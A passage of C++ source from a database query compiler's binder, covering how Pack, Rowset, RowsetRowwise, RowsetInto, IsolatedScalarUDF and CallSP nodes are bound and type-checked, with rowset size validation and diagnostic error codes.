NULL_VALUE_ID); valVidu->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert this valueIdUnion node into the list of valueIdUnions // in the proper entry in transUnionVector_ // transUnionVector()[i + 1].insert(valVidu->getValueId()); // Get the val column reference // ColReference *valCol = (ColReference *)newCols[k]; // Must have Column Refs to val column. // CMPASSERT(valCol); //Get the val column name. // NAString valColName( valCol->getColRefNameObj().getColName(), bindWA->wHeap()); // Add the transpose column // (as the union of all of the transposed value columns) // resultTable->addColumn(bindWA, valColName, valVidu->getValueId()); } } // Set the return descriptor // setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Bind the base class. // return bindSelf(bindWA); } // Transpose::bindNode() // ----------------------------------------------------------------------- // The Pack node binds itself by componsing its packing expression from // all the columns available in its child's RETDesc. The packed columns // produced by the packing expression are then made available in the Pack // node's own RETDesc. // ----------------------------------------------------------------------- RelExpr* Pack::bindNode(BindWA* bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; // --------------------------------------------------------------------- // The Pack node has a packing expression stored as packingExprTree_ // before binding. If packingExprTree_ is NULL, we are just going to // pick up all the columns from the output of its child. During binding, // this tree is converted into a value id list. // --------------------------------------------------------------------- // Create and bind the packing factor item expression. #pragma nowarn(1506) // warning elimination ItemExpr* pfie = new (bindWA->wHeap()) SystemLiteral(packingFactorLong()); #pragma warn(1506) // warning elimination pfie->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert vid of bound constant into packingFactor valueIdSet. packingFactor().clear(); packingFactor().insert(pfie->getValueId()); // Create my RETDesc to hold the packed columns. RETDesc* resultTable = new (bindWA->wHeap()) RETDesc (bindWA); // Bind the tree if its present. if (packingExprTree_) { ItemExpr* packExprTree = removePackingExprTree(); packExprTree->convertToValueIdList(packingExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; for (CollIndex i = 0; i < packingExpr().entries(); i++) { // Add all columns to result table. NAString packedColName( "PACKEDCOL_", bindWA->wHeap()); packedColName += bindWA->fabricateUniqueName(); #pragma nowarn(1506) // warning elimination Int32 length = packedColName.length(); #pragma warn(1506) // warning elimination char * colName = new (bindWA->wHeap()) char[length + 1]; colName[length] = 0; #pragma nowarn(1506) // warning elimination str_cpy_all(colName, packedColName, packedColName.length()); #pragma warn(1506) // warning elimination ColRefName colRefName(colName); resultTable->addColumn(bindWA, colRefName, packingExpr().at(i), USER_COLUMN, colName); } } else // no packing expr tree, get all the columns from child. { // Get RETDesc from child which is assumed to be a RelRoot. too strict? const RETDesc& childTable = *child(0)->getRETDesc(); ValueIdList childTableVidList; // These are only the user columns. Are SYS columns important? childTable.getValueIdList(childTableVidList); // Initialize packing expression. packingExpr().clear(); // For each column in child's RETDesc, put a PackFunc() on top of it. for (CollIndex i = 0; i < childTableVidList.entries(); i++) { ItemExpr* childItemExpr = childTableVidList[i].getItemExpr(); PackFunc* packedItemExpr = new (bindWA->wHeap()) PackFunc(childItemExpr,pfie); // Bind the packed column. packedItemExpr->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert into both the result table and my packingExpr_. packingExpr().insert(packedItemExpr->getValueId()); // $$$ Any implications of this? Needed to be seen. // Use the original column name as the packed column name. The index // is on USER columns only. SYS columns matter? ColRefName colRefName = childTable.getColRefNameObj(i); const char* heading = childTable.getHeading(i); // Insert into RETDesc for RelRoot above it to pick up as select-list. resultTable->addColumn(bindWA, colRefName, packedItemExpr->getValueId(), USER_COLUMN, heading); // $$$ // OR: start with making a copy of child's RETDesc and change each col // to point to the vid for the packed column instead of the original. } } // Set the result table, bind self and return. setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); bindSelf(bindWA); // To test packing. Add a unpack node on top of this pack node to check. char* env = getenv("PACKING_FACTOR"); if (env && atol(env) > 0) { Lng32 pf = atol(env); ItemExpr* unPackExpr = NULL; ItemExpr* rowFilter = NULL; ItemExpr* unPackItem; ItemExpr* numRows; const NAType* typeInt = new(bindWA->wHeap()) SQLInt(TRUE,FALSE); ValueIdList packedCols; resultTable->getValueIdList(packedCols); NAString hostVarName("_sys_UnPackIndex", bindWA->wHeap()); hostVarName += bindWA->fabricateUniqueName(); ItemExpr* indexHostVar = new(bindWA->wHeap()) HostVar(hostVarName,new(bindWA->wHeap()) SQLInt(TRUE,FALSE),TRUE); indexHostVar->synthTypeAndValueId(); for (CollIndex i=0; i < packedCols.entries(); i++) { const NAType* colType = &(packedCols[i].getItemExpr()->child(0)->getValueId().getType()); Lng32 width = colType->getNominalSize(); #pragma nowarn(1506) // warning elimination Lng32 base = (colType->supportsSQLnullPhysical() ? (pf-1)/CHAR_BIT +1 : 0) + sizeof(Int32); #pragma warn(1506) // warning elimination // $$$ Some duplicate code to be moved to PackColDesc later. ColRefName colRefName; colRefName = resultTable->getColRefNameObj(i); unPackItem = new(bindWA->wHeap()) UnPackCol(packedCols[i].getItemExpr(), indexHostVar, width, base, colType->supportsSQLnull(), colType); numRows = new(bindWA->wHeap()) UnPackCol(packedCols[i].getItemExpr(), new(bindWA->wHeap()) SystemLiteral(0), typeInt->getNominalSize(), 0, FALSE, typeInt); unPackExpr = (unPackExpr ? new(bindWA->wHeap()) ItemList(unPackExpr,unPackItem) : unPackItem); rowFilter = (rowFilter ? new(bindWA->wHeap()) ItemList(rowFilter,numRows) : numRows); } RelExpr* unpack = new(bindWA->wHeap()) UnPackRows(pf,unPackExpr,rowFilter,NULL, this, indexHostVar->getValueId()); return unpack->bindNode(bindWA); } return this; } // Pack::bindNode() RelExpr * Rowset::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; if (bindWA->getHostArraysArea()) { bindWA->getHostArraysArea()->done() = TRUE; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Transform current node into a new subtree which performs access to // RowSet based on the unpacking and tuple node expression operators. // The formed tuple is composed of all input RowSet host variables: // Rowset-tuple: array_hv1, array_hv2, ... array_hvN. // The Unpack expression is used to retrieve the elements of the Rowset // with an indexed operator. For example, retrieve values for index two // for each Rowset host variable. // The transformed subtree has the following structure // // UNPACK // | // TUPLE // // Note that the original Rowset relational expression has a rename node // on top. // // First find the maxRowSetSize and its rowsetSizeExpr. The rowset size is // the smallest declared dimension of the arrays composing the rowset. // If a constant rowset size was given in the SQL statement, it must be // samaller than the computed value. NABoolean hasDifferentSizes = FALSE; Lng32 maxRowsetSize = 0; /* Maximum number of Rows in Rowset */ ItemExpr *rowsetSizeExpr; ItemExpr *hostVarTree; // We get the list of input host vars, which is stored in the root of the // parse tree HostArraysWA *arrayArea = bindWA->getHostArraysArea(); RelRoot *root = bindWA->getTopRoot(); // Do any extra checking at this moment. for (hostVarTree = inputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { CMPASSERT(hostVarTree->getOperatorType() == ITM_ITEM_LIST); HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); if (hostVar->getOperatorType() != ITM_HOSTVAR || hostVar->getType()->getTypeQualifier() != NA_ROWSET_TYPE) { // 30001 A rowset must be composed of host variable arrays *CmpCommon::diags() << DgSqlCode(-30001); bindWA->setErrStatus(); return NULL; } // Get the smallest dimension for rowset size SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); if (hostVarType->getNumElements() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be greater // than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32)hostVarType->getNumElements()); bindWA->setErrStatus(); return NULL; } if (maxRowsetSize == 0) maxRowsetSize = hostVarType->getNumElements(); else if (hostVarType->getNumElements() != maxRowsetSize) { // 30005 The dimensions of the arrays composing the RowSet are // different. The smallest dimesnion is assumed. // This is just a warning // Give the warning only once if (hasDifferentSizes == FALSE) { if (arrayArea->hasDynamicRowsets()) { // 30015 The dimesion of the arrays composing the RowSet must be same // in dynamic SQL *CmpCommon::diags() << DgSqlCode(-30015) ; bindWA->setErrStatus(); return NULL; } // for static SQL this is only a warning. hasDifferentSizes = TRUE; *CmpCommon::diags() << DgSqlCode(30005); } // Pick the smallest one if (hostVarType->getNumElements() < maxRowsetSize) maxRowsetSize = hostVarType->getNumElements(); } // Make sure that the element type null indicator and the corresponding // rowset array are both nullable or not nullable. That is, force it NAType* hostVarElemType = hostVarType->getElementType(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); // If hostVarType is Unknown then this a dynamic param that has been // converted into a hostvar. For dynamic params there is no null // indicator variable/param specified in the query text, so the previous // check will always return FALSE. We will set all dynamic params to be // nullable and let type synthesis infer nullability later on. if (hostVarElemType->getTypeQualifier() == NA_UNKNOWN_TYPE) hostVarElemNullInd = TRUE; hostVarElemType->setNullable(hostVarElemNullInd); } // If a rowset size expression was produced during parsing, it is used // to restrict the rowset size during execution. The expression must be // an numeric literal (known at compile time) or an integer host variable // (known at execution time). We do not allow other type of expression // since the rowset size must be know before the statement is executed to // avoid copying a lot when the host variable arrays are sent down the // execution queue // If there is no size specification of the form ROWSET <size> ( <list> ) then // we take the size from ROWSET FOR INPUT SIZE <size> if (!sizeExpr_ && bindWA->getHostArraysArea()) { sizeExpr_ = bindWA->getHostArraysArea()->inputSize(); if ((bindWA->getHostArraysArea()->getInputArrayMaxSize() > 0) && (!sizeExpr_ )) { // ODBC process is performing a bulk insert and we need to create // an input parameter to simulate the functionality of ROWSET FOR INPUT // SIZE ... syntax. NAString name = "__arrayinputsize" ; HostVar *node = new (bindWA->wHeap()) HostVar(name, new(bindWA->wHeap()) SQLInt(TRUE,FALSE), TRUE); node->setHVRowsetForInputSize(); root->addAtTopOfInputVarTree(node); sizeExpr_ = (ItemExpr *) node ; } } if (sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { if (((ConstValue *)sizeExpr_)->getType()->getTypeQualifier() != NA_NUMERIC_TYPE) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be // greater than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32) (((ConstValue *)sizeExpr_) ->getExactNumericValue())); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() > maxRowsetSize) { // 30002 The given RowSet size ($0~Int0) must be smaller or // equal to the smallest dimension ($1Int1) of the // arrays composing the rowset *CmpCommon::diags() << DgSqlCode(-30002) << DgInt0((Int32) ((ConstValue *)sizeExpr_) ->getExactNumericValue()) << DgInt1(maxRowsetSize); bindWA->setErrStatus(); return NULL; } else { maxRowsetSize = (Lng32)((ConstValue *)sizeExpr_)->getExactNumericValue() ; } } else if (!((sizeExpr_->getOperatorType() == ITM_HOSTVAR && ((HostVar *)sizeExpr_)->getType()->getTypeQualifier() == NA_NUMERIC_TYPE) || (sizeExpr_->getOperatorType() == ITM_DYN_PARAM ) || ((sizeExpr_->getOperatorType() == ITM_CAST) && (sizeExpr_->child(0)->getOperatorType() == ITM_DYN_PARAM)))) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30014); bindWA->setErrStatus(); return NULL; } // We return a -1 if the execution time rowset size exceeds the maximum // declared size ItemExpr *maxSize = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); ItemExpr *neg = new (bindWA->wHeap()) SystemLiteral(-1); ItemExpr *constrPred = new (bindWA->wHeap()) BiRelat(ITM_GREATER, sizeExpr_, maxSize); rowsetSizeExpr = new (bindWA->wHeap()) IfThenElse(constrPred, neg, sizeExpr_); // IfThenElse only works if Case is its parent. rowsetSizeExpr = new (bindWA->wHeap()) Case (NULL, rowsetSizeExpr); // At code generation time, it is assumed that the size expression // is of size integer, so we do this cast. We do not allow null // values. rowsetSizeExpr = new (bindWA->wHeap()) Cast(rowsetSizeExpr, new (bindWA->wHeap()) SQLInt(TRUE,FALSE)); // For dynamic rowsets, the parameter specifying rowset for input size // must be typed as an non-nullable integer. if (sizeExpr_->getOperatorType() == ITM_DYN_PARAM ) { sizeExpr_->synthTypeAndValueId(); SQLInt intType(TRUE,FALSE); // TRUE -> allow neagtive values, FALSE -> not nullable (sizeExpr_->getValueId()).coerceType(intType, NA_NUMERIC_TYPE); } } else { rowsetSizeExpr = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); } // Construct an index host variable to iterate over the elements of the // rowset. The name of the host variable must be unique (fabricated // by calling fabricateUniqueName). This host variable is bound since it // is not an input of the parse tree. Call synthTypeAndValueId() // which does the minimum binding. NAString indexName(bindWA->wHeap()); if (indexExpr_) { // Get the name. indexName = ((ColReference *)indexExpr_)->getColRefNameObj().getColName(); } else { indexName = "_sys_rowset_index" + bindWA->fabricateUniqueName(); } const NAType *indexType = new (bindWA->wHeap()) SQLInt(TRUE, FALSE); ItemExpr *indexHostVar = new (bindWA->wHeap()) HostVar(indexName, indexType, TRUE // is system-generated ); indexHostVar->synthTypeAndValueId(); // Generate the RowsetArrayScan expressions which are used to extract // an element value of the rowset array given an index. ItemExpr *unPackExpr = NULL; for (hostVarTree = inputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); NAType* hostVarElemType = hostVarType->getElementType(); Lng32 hostVarElemSize = hostVarElemType->getTotalSize(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); // Force all host variable to have the same number of elements which was // found previously hostVarType->setNumElements(maxRowsetSize); // The element size must be align hostVarElemSize = ALIGN(hostVarElemSize, hostVarElemType->getDataAlignment()); // Assign a valueId for this Host variable. UnPackRows node will need // this valueId during its binding. //hostVar->synthTypeAndValueId(); hostVar->bindNode(bindWA); ItemExpr *unPackCol = new (bindWA->wHeap()) RowsetArrayScan(hostVar, // Rowset Host Var array indexHostVar, // Index maxRowsetSize, // Cannot go over this size hostVarElemSize, // Element size in bytes hostVarElemNullInd, hostVarElemType ); // Construct a list of expressions to extract the Data value from // the packed row. During normalization, this list (or a ValueIdList // representing this list) will be reduced to the minimum required. // This should be a NULL terminated list, unfortunately, there are // many parts in the SQL/MX code that loops over the arity instead // of checking for NULL terminated list...the effect a segmentation // violation. unPackExpr = (unPackExpr ? new (bindWA->wHeap()) ItemList(unPackExpr, unPackCol) : unPackCol); } // enable rowsetrowcount for rowset update and deletes // if the user has not turned the feature OFF. // if we have rowsets in where clause and are not in a select // then we have either rowset ypdate or delete, for direct rowsets. if (arrayArea && (!(arrayArea->getHasDerivedRowsets())) && arrayArea->hasHostArraysInWhereClause() && (arrayArea->hasInputRowsetsInSelectPredicate() != HostArraysWA::YES_) && (CmpCommon::getDefault(ROWSET_ROW_COUNT) == DF_ON)) { arrayArea->setRowsetRowCountArraySize(maxRowsetSize); } if (indexExpr_) { /* * Create and item expression to obtain the index */ ItemExpr *unPackCol = new (bindWA->wHeap()) RowsetArrayScan(indexHostVar, // Index indexHostVar, // Index maxRowsetSize, // Cannot go over this size indexType->getTotalSize(), 0, indexType, ITM_ROWSETARRAY_ROWID ); unPackExpr = (unPackExpr ? new (bindWA->wHeap()) ItemList(unPackExpr, unPackCol) : unPackCol); } // Now create a Tuple node to hang the children and input values of the // actual Rowset Node to it. Make sure to copy the RelExpr part of Rowset // to tuple. // Kludge up a dummy child for the index ItemExpr *inputs = ((indexExpr_) ? new (bindWA->wHeap()) ItemList(inputHostvars_, indexHostVar) : inputHostvars_); Tuple *tupleExpr = new (bindWA->wHeap()) Tuple(inputs); tupleExpr->setBlockStmt(isinBlockStmt()); copyTopNode(tupleExpr); // Construct the replacement tree for the Rowset operator. RelExpr *newSubTree = (new (bindWA->wHeap()) UnPackRows(maxRowsetSize, unPackExpr, rowsetSizeExpr, NULL, tupleExpr, indexHostVar->getValueId())); newSubTree->setBlockStmt(isinBlockStmt()); // do not set this flag for derived rowsets. This flag is used in generator to determine // in onlj and TF TDB must set rownumber when encountering a execution time rowset error. if (arrayArea && (!(arrayArea->getHasDerivedRowsets())) && (arrayArea->hasInputRowsetsInSelectPredicate() != HostArraysWA::YES_)) { newSubTree->setRowsetIterator(TRUE); } // Move any predicate on the packed table to be on the result // of unpacking. newSubTree->addSelPredTree(removeSelPredTree()); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // Rowset::bindNode() RelExpr * RowsetRowwise::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; if (bindWA->getHostArraysArea()) { bindWA->getHostArraysArea()->done() = TRUE; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Transform current node into a new subtree which performs access to // RowSet based on the unpacking. // UNPACK // | // TUPLE // // We get the list of input host vars, which is stored in the root of the // parse tree HostArraysWA *arrayArea = bindWA->getHostArraysArea(); if ((arrayArea->rwrsMaxSize()->getOperatorType() != ITM_CONSTANT) || (((ConstValue *)arrayArea->rwrsMaxSize())->getType()->getTypeQualifier() != NA_NUMERIC_TYPE)) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } // if partition number has been specified, then we don't unpack // rows. The whole buffer is shipped to the specified partition. if (arrayArea->partnNum()) return child(0)->castToRelExpr(); Lng32 maxRowsetSize = (Lng32)((ConstValue *)arrayArea->rwrsMaxSize())->getExactNumericValue() ; NAType * typ = new(bindWA->wHeap()) SQLInt(FALSE, FALSE); ItemExpr * rwrsInputSizeExpr = new(bindWA->wHeap()) Cast(arrayArea->inputSize(), typ); if (bindWA->errStatus()) return this; ItemExpr * rwrsMaxInputRowlenExpr = new(bindWA->wHeap()) Cast(arrayArea->rwrsMaxInputRowlen(), typ); if (bindWA->errStatus()) return this; ItemExpr * rwrsBufferAddrExpr = arrayArea->rwrsBuffer(); if (bindWA->errStatus()) return this; // Construct the replacement tree for the Rowset operator. RelExpr *newSubTree = (new (bindWA->wHeap()) UnPackRows(maxRowsetSize, rwrsInputSizeExpr, rwrsMaxInputRowlenExpr, rwrsBufferAddrExpr, child(0))); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // RowsetRowwise::bindNode() // LCOV_EXCL_START - rfi RelExpr * RowsetFor::bindNode(BindWA* bindWA) { // Binding of this node should not happen. It should have been eliminated // by now by the pre-binding step. Its content is used to populate the // RowSet node with options. CMPASSERT(0); return NULL; } // LCOV_EXCL_STOP RelExpr * RowsetInto::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; NABoolean hasDifferentSizes = FALSE; Lng32 maxRowsetSize = 0; /* Maximum number of Rows in Rowset */ ULng32 numOutputHostvars = 0; ItemExpr *rowsetSizeExpr; ItemExpr *hostVarTree; // Do any extra checking at this moment. for (hostVarTree = outputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { numOutputHostvars++; CMPASSERT(hostVarTree->getOperatorType() == ITM_ITEM_LIST); HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); if (hostVar->getOperatorType() != ITM_HOSTVAR || hostVar->getType()->getTypeQualifier() != NA_ROWSET_TYPE) { // 30001 A rowset must be composed of host variable arrays *CmpCommon::diags() << DgSqlCode(-30001); bindWA->setErrStatus(); return NULL; } // Get the smallest dimension for rowset size SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); if (hostVarType->getNumElements() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be greater // than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32)hostVarType->getNumElements()); bindWA->setErrStatus(); return NULL; } if (maxRowsetSize == 0) maxRowsetSize = hostVarType->getNumElements(); else if (hostVarType->getNumElements() != maxRowsetSize) { // 30005 Warning: the dimensions of the arrays composing the RowSet are // different. The smallest dimesnion is assumed. // This is just a warning // Give the warning only once if (hasDifferentSizes == FALSE) { hasDifferentSizes = TRUE; *CmpCommon::diags() << DgSqlCode(30005); } // Pick the smallest one if (hostVarType->getNumElements() < maxRowsetSize) maxRowsetSize = hostVarType->getNumElements(); } // Make sure that the element type null indicator and the corresponding // rowset array are both nullable or not nullable. That is, force it NAType* hostVarElemType = hostVarType->getElementType(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); hostVarElemType->setNullable(hostVarElemNullInd); } // If a rowset size expression was produced during parsing, it is used // to restrict the rowset size during execution. The expression must be // an numeric literal (known at compile time) or an integer host variable // (known at execution time). We do not allow other type of expression // since the rowset size must be know before the statement is executed to // avoid copying a lot when the host variable arrays are sent down the // execution queue if (sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { if (((ConstValue *)sizeExpr_)->getType()->getTypeQualifier() != NA_NUMERIC_TYPE) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() > maxRowsetSize) { // 30002 The given RowSet size ($0~Int0) must be smaller or // equal to the smallest dimension ($1Int1) of the // arrays composing the rowset *CmpCommon::diags() << DgSqlCode(-30002) << DgInt0((Int32) ((ConstValue *)sizeExpr_) ->getExactNumericValue()) << DgInt1(maxRowsetSize); bindWA->setErrStatus(); return NULL; } } else if (!(sizeExpr_->getOperatorType() == ITM_HOSTVAR && ((HostVar *)sizeExpr_)->getType()->getFSDatatype() == REC_BIN32_SIGNED)) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } rowsetSizeExpr = sizeExpr_; } else rowsetSizeExpr = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ // 30020 Embedded update/delete cannot be used with SELECT...INTO and rowset. *CmpCommon::diags() << DgSqlCode(-30020); bindWA->setErrStatus(); return NULL; } // Generate the RowsetArrayInto expressions which are used to append // an element value to the rowset array. // Get RETDesc from its only child one which must be RelRoot type. const RETDesc& childTable = *child(0)->getRETDesc(); ValueIdList childTableVidList; childTable.getValueIdList(childTableVidList); if (numOutputHostvars != childTableVidList.entries()) { // 4094 The number of output host vars ($0) must equal the number of cols *CmpCommon::diags() << DgSqlCode(-4094) #pragma nowarn(1506) // warning elimination << DgInt0(numOutputHostvars) << DgInt1(childTableVidList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ItemExpr *packExpr = NULL; Lng32 i; for (hostVarTree = outputHostvars_, i = 0; hostVarTree; hostVarTree = hostVarTree->child(1), i++) { HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); NAType* hostVarElemType = hostVarType->getElementType(); // hostVarElemType->setNullable(TRUE); Lng32 hostVarElemSize = hostVarElemType->getTotalSize(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); ItemExpr* sourceExpr = childTableVidList[i].getItemExpr(); ValueId sourceId = childTableVidList[i]; const NAType& targetType = *hostVarElemType; sourceId.coerceType(targetType); const NAType& sourceType = sourceId.getType(); NABoolean relaxCharTypeMatchingRule = FALSE; // We make sure that the types that are coming from below this // node match properly with the types it has if (NOT targetType.isCompatible(sourceType)) { // JQ // Relaxing Characet Data Type mismatching rule. if ( targetType.getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE && ((const CharType&)targetType).getCharSet() == CharInfo::UNICODE && ((const CharType&)sourceType).getCharSet() == CharInfo::ISO88591 ) { relaxCharTypeMatchingRule = TRUE; } if ( !relaxCharTypeMatchingRule ) { // Incompatible assignment from type $0~String0 to type $1~String1 *CmpCommon::diags() << DgSqlCode(-30007) << DgString0(sourceType.getTypeSQLname(TRUE /*terse*/)) << DgString1(targetType.getTypeSQLname(TRUE /*terse*/)); bindWA->setErrStatus(); return FALSE; } } // Force all host variable to have the same number of elements which was // found previously hostVarType->setNumElements(maxRowsetSize); // The element size must be align hostVarElemSize = ALIGN(hostVarElemSize, hostVarElemType->getDataAlignment()); // Preserve the length that is coming from the node below this one if (hostVarElemType->getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE) { Int32 sourceSize = ((CharType *) &sourceType)->getDataStorageSize(); Int32 targetSize = ((CharType *) hostVarElemType)->getDataStorageSize(); if (sourceSize > targetSize ) { // Adjust the layout size instead of changing the element size? ((CharType *) hostVarElemType)->setDataStorageSize(sourceSize); } } if ( relaxCharTypeMatchingRule == TRUE ) sourceExpr = new (bindWA->wHeap()) Translate(sourceExpr, Translate::ISO88591_TO_UNICODE); // If the type is external (for instance, decimal or varchar), we must first // convert to our internal equivalent type if (hostVarElemType->isExternalType()) { NAType *internalType = hostVarElemType->equivalentType(); sourceExpr = new (bindWA->wHeap()) Cast(sourceExpr, internalType); } sourceExpr = new (bindWA->wHeap()) Cast(sourceExpr, hostVarElemType); ItemExpr *packCol = new (bindWA->wHeap()) RowsetArrayInto(sourceExpr, rowsetSizeExpr, // Runtime size maxRowsetSize, // Cannot go over this size hostVarElemSize, // Element size in bytes hostVarElemNullInd, hostVarType ); // Construct a list of expressions to append the Data value to the // RowSet array. This list should be a NULL terminated list, // unfortunately, there are many parts in the SQL/MX code that // loops over the arity instead of checking for NULL terminated // list...the effect a segmentation violation. packExpr = (packExpr ? new (bindWA->wHeap()) ItemList(packExpr, packCol) : packCol); } // Construct the replacement tree for the RowsetInto operator. RelExpr *newSubTree = (new (bindWA->wHeap()) Pack(maxRowsetSize, child(0)->castToRelExpr(), packExpr)); newSubTree->setFirstNRows(getFirstNRows()); // If we have an ORDER BY when there is an INTO :array, then we // add the requirement that the tuples that this Pack node will // receive must be sorted ValueIdList *ptrReqOrder; ptrReqOrder = new (bindWA->wHeap()) ValueIdList(((RelRoot *) (RelExpr *) newSubTree->child(0))->reqdOrder()); ((Pack *) newSubTree)->setRequiredOrder(*ptrReqOrder); // Remember the transform tree, just in case someone is trying to bind this // node again. transformRelexpr_ = newSubTree; // Bind the new generated subtree. return newSubTree->bindNode(bindWA); } // RowsetInto::bindNode RelExpr * IsolatedScalarUDF::bindNode (BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // If we have a RoutineDesc, it means we got transformed from a // a UDFunction ItemExpr, and do NOT need to check all the metadata // params etc. if (getRoutineDesc() == NULL ) { // If we get here, we created a IsolatedScalarUDF some other way // than through the transformation of UDFunction. Either that or // we have someone walking over our memory... CMPASSERT(0); bindWA->setErrStatus(); return this; } else { markAsBound(); } return this; } // IsolatedScalarUDF::bindNode () /* * This method performs binder functions for the CALLSP node * It performs semantic checks on the called stored procedure * creates a Tuple child and allocates ValueIds for the parameters * It also provides support for the CLI layer processing for OUT * parameter processing. */ RelExpr *CallSP::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (bindWA->getHoldableType() == SQLCLIDEV_ANSI_HOLDABLE) { *CmpCommon::diags() << DgSqlCode(-4382); bindWA->setErrStatus(); bindWA->setBindingCall (FALSE); return this; } bindWA->setBindingCall (TRUE); bindWA->setCurrOrdinalPosition (1); bindWA->setCurrParamMode (COM_UNKNOWN_DIRECTION); bindWA->clearHVorDPinSPDups (); bindWA->setDupWarning (FALSE); bindWA->setMaxResultSets(0); // try PUBLIC SCHEMA only when no schema was specified // and CQD PUBLIC_DEFAULT_SCHEMA is specified NAString pSchema = ActiveSchemaDB()->getDefaults().getValue(PUBLIC_SCHEMA_NAME); ComSchemaName pubSchema(pSchema); NAString pubSchemaIntName = ""; if ( (getRoutineName().getSchemaName().isNull()) && (!pubSchema.getSchemaNamePart().isEmpty()) ) { pubSchemaIntName = pubSchema.getSchemaNamePart().getInternalName(); } // Invoke GetNARoutine () to retrieve the corresponding NARoutine from // NARoutineDB_ QualifiedName name = getRoutineName(); const SchemaName &defaultSchema = bindWA->getSchemaDB ()->getDefaultSchema(); name.applyDefaults(defaultSchema); setRoutineName(name); bindWA->setCurrSPName(&name); // in open source, only the SEABASE catalog is allowed. // Return an error if some other catalog is being used. if ((NOT name.isSeabase()) && (NOT name.isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(name.getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } CmpSeabaseDDL cmpSBD((NAHeap*)bindWA->wHeap()); desc_struct *catRoutine = cmpSBD.getSeabaseRoutineDesc( name.getCatalogName(), name.getSchemaName(), name.getObjectName()); // try public schema if ( !catRoutine && !pubSchemaIntName.isNull() ) { getRoutineName().setSchemaName(pubSchemaIntName); if ( !pubSchema.getCatalogNamePart().isEmpty() ) { getRoutineName().setCatalogName(pubSchema.getCatalogNamePart().getInternalName()); } // in open source, only the SEABASE catalog is allowed. // Return an error if some other catalog is being used. if ((NOT getRoutineName().isSeabase()) && (NOT getRoutineName().isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(getRoutineName().getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } bindWA->resetErrStatus(); catRoutine = cmpSBD.getSeabaseRoutineDesc( getRoutineName().getCatalogName(), getRoutineName().getSchemaName(), getRoutineName().getObjectName()); if ( 